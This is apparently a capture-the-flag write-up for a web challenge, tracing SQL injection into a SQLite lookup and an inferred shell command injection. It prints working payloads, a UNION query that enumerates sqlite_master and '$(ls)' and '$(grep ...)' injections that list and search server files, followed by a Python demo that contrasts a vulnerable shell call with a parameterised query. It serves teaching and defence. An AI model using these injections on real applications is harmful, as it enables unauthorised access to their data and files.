Biocheck

Description

Biocheck [Web]

ARIA has started making simple applications to display their intelligence, but they're still in a rough state. Break in, and discover the critical information!

https://uscybercombine-s4-biocheck.chals.io/

Solution

We can query information about historical figures, but we are limited to a few people.


If we inject a quote (') we get a 500 error, meaning there's probably an SQL query being used.

Check whether it is SQLite3: Albert Einstein' UNION SELECT sqlite_version(); -- -

PayloadsAllTheThings/SQL Injection/SQLite Injection.md

' UNION SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%
> figures

' UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='figures
> CREATE TABLE figures (
	id INTEGER PRIMARY KEY,
	name TEXT NOT NULL,
	bio TEXT NOT NULL
)

The database only holds figure records and that's it.

I was testing for SSTI since it's a Python server, but was going nowhere. Then I tried ${{7*7}} and the app crashed (added dollar). Why? I think the only programming languages that treat dollars as special characters are PHP or Bash; we are on a Python server, so that leaves Bash. Trying the $0 shell variable, we get the runner program name:

Payload: '; SELECT '$(ls)'; -- -

Payload: ' UNION SELECT '$(grep "SIVBGR" . -Rain)' -- -
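Why a `$` can crash the lookup and why `$(...)` is evaluated before any SQL runs, as an added example that is not the challenge's code. It assumes the server pastes the name into a shell command line that runs the query (the write-up's inference, not confirmed by the page); `query_seen_after_shell`, `lookup_bio` and the sample row are hypothetical, and `printf` stands in for the database CLI. The second function is the hardened form: no shell, and the name is a bound parameter.

```python
import sqlite3
import subprocess

# Schema from the write-up; the row is constructed sample data.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE figures (id INTEGER PRIMARY KEY, name TEXT NOT NULL, bio TEXT NOT NULL)")
DB.execute("INSERT INTO figures (name, bio) VALUES (?, ?)",
           ("Albert Einstein", "Physicist (constructed sample bio)"))


def query_seen_after_shell(name):
    """Assumed vulnerable pattern: the query is pasted into a shell command line.

    printf stands in for the database CLI so no extra binary is needed.
    Returns (exit_code, query_text_the_CLI_would_receive).
    """
    cmd = "printf '%s' \"SELECT bio FROM figures WHERE name = '" + name + "'\""
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.returncode, proc.stdout


def lookup_bio(name):
    """Hardened lookup: no shell, and the name is bound data, never SQL text."""
    row = DB.execute("SELECT bio FROM figures WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # "$(echo EXPANDED)" is a constructed, harmless probe; the others are from the write-up.
    for probe in ("Albert Einstein", "$(echo EXPANDED)", "${{7*7}}",
                  "Albert Einstein' UNION SELECT sqlite_version(); -- -"):
        print(repr(probe), query_seen_after_shell(probe), lookup_bio(probe))
```

In the assumed pattern the shell rewrites or rejects the command before the database sees it, which matches the crash on `${{7*7}}`; with the bound parameter every probe is just a name that matches no row.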
